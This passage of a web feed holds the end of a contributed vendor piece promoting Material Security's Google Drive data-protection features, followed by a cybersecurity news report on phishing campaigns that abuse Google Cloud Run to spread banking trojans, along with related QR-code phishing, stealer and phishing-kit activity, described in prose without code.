  • Automatically revoking public links for any file that contains classified information
  • Sending users a message to confirm external sharing when files contain any sensitive data
  • Cutting off access to all files shared with specific external domains in a single bulk job
  • Revoking all access to a specific account that displays behaviors of a compromise
  • Resetting any files accessible to the organization that contain personal health information to Restricted

Applying automation generally can get in the way of day-to-day use, so it’s important to build with precision – a better understanding of the nature of content, which domains are trusted, and common user behaviors help you contain the surface area the right way.


Keep your productivity suite productive with Material Security

At Material, we focus our efforts on the productivity suite because we believe that it’s critical infrastructure to any organization. And as critical infrastructure, in-depth security defenses that can effectively stop attacks and reduce risk across the environment are paramount.

The new capabilities in Data Protection for Google Drive address data discovery, governance, and access problems that have traditionally been hard to solve without dedicated tooling.

Want to see it for yourself? Schedule a personal demo with our team today.

This article is a contributed piece from one of our valued partners.

Banking Trojans Target Latin America and Europe Through Google Cloud Run (https://www.indiavpn.org/2024/02/26/banking-trojans-target-latin-america-and-europe-through-google-cloud-run/, Mon, 26 Feb 2024 10:48:16 +0000)

Banking Trojan

Cybersecurity researchers are warning about a spike in email phishing campaigns that are weaponizing the Google Cloud Run service to deliver various banking trojans such as Astaroth (aka Guildma), Mekotio, and Ousaban (aka Javali) to targets across Latin America (LATAM) and Europe.

“The infection chains associated with these malware families feature the use of malicious Microsoft Installers (MSIs) that function as droppers or downloaders for the final malware payload(s),” Cisco Talos researchers disclosed last week.

The high-volume malware distribution campaigns, observed since September 2023, have employed the same storage bucket within Google Cloud for propagation, suggesting potential links between the threat actors behind the distribution campaigns.

Google Cloud Run is a managed compute platform that enables users to run frontend and backend services, batch jobs, deploy websites and applications, and queue processing workloads without having to manage or scale the infrastructure.

“Adversaries may view Google Cloud Run as an inexpensive, yet effective way to deploy distribution infrastructure on platforms that most organizations likely do not prevent internal systems from accessing,” the researchers said.

A majority of the systems used to send phishing messages originate from Brazil, followed by the U.S., Russia, Mexico, Argentina, Ecuador, South Africa, France, Spain, and Bangladesh. The emails bear themes related to invoices or financial and tax documents, in some cases purporting to be from local government tax agencies.


Embedded within these messages are links to a website hosted on run[.]app, resulting in the delivery of a ZIP archive containing a malicious MSI file either directly or via 302 redirects to a Google Cloud Storage location, where the installer is stored.

The threat actors have also been observed attempting to evade detection using geofencing tricks by redirecting visitors to these URLs to a legitimate site like Google when accessing them with a U.S. IP address.

Besides leveraging the same infrastructure to deliver both Mekotio and Astaroth, the infection chain associated with the latter acts as a conduit to distribute Ousaban.

Astaroth, Mekotio, and Ousaban are all designed to single out financial institutions, keeping tabs on users’ web browsing activity as well as logging keystrokes and taking screenshots should one of the target bank websites be open.

Ousaban has a history of weaponizing cloud services to its advantage, having previously employed Amazon S3 and Microsoft Azure to download second-stage payloads, and Google Docs to retrieve command-and-control (C2) configuration.

The development comes amid phishing campaigns propagating malware families such as DCRat, Remcos RAT, and DarkVNC that are capable of harvesting sensitive data and taking control of compromised hosts.

It also follows an uptick in threat actors deploying QR codes in phishing and email-based attacks (aka quishing) to trick potential victims into installing malware on their mobile devices.


“In a separate attack, the adversaries sent targets spear-phishing emails with malicious QR codes pointing to fake Microsoft Office 365 login pages that eventually steal the user’s login credentials when entered,” Talos said.

“QR code attacks are particularly dangerous because they move the attack vector off a protected computer and onto the target’s personal mobile device, which usually has fewer security protections in place and ultimately has the sensitive information that attackers are after.”

Phishing campaigns have also set their eyes on the oil and gas sector to deploy an information stealer called Rhadamanthys, which has currently reached version 0.6.0, highlighting a steady stream of patches and updates by its developers.

“The campaign starts with a phishing email using a vehicle incident report to lure victims into interacting with an embedded link that abuses an open redirect on a legitimate domain, primarily Google Maps or Google Images,” Cofense said.


Users who click on the link are then redirected to a website hosting a bogus PDF file, which, in reality, is a clickable image that contacts a GitHub repository and downloads a ZIP archive containing the stealer executable.

“Once a victim attempts to interact with the executable, the malware will unpack and start a connection with a command-and-control (C2) location that collects any stolen credentials, cryptocurrency wallets, or other sensitive information,” the company added.

Other campaigns have abused email marketing tools like Twilio’s SendGrid to obtain client mailing lists and take advantage of stolen credentials to send out convincing-looking phishing emails, per Kaspersky.

“What makes this campaign particularly insidious is that the phishing emails bypass traditional security measures,” the Russian cybersecurity company noted. “Since they are sent through a legitimate service and contain no obvious signs of phishing, they may evade detection by automatic filters.”

These phishing activities are further fueled by the easy availability of phishing kits such as Greatness and Tycoon, which have become a cost-effective and scalable means for aspiring cyber criminals to mount malicious campaigns.

“Tycoon Group [phishing-as-a-service] is sold and marketed on Telegram for as low as $120,” Trustwave SpiderLabs researcher Rodel Mendrez said last week, noting the service first came into being around August 2023.

“Its key selling features include the ability to bypass Microsoft two-factor authentication, achieve ‘link speed at the highest level,’ and leveraging Cloudflare to evade antibot measures, ensuring the persistence of undetected phishing links.”

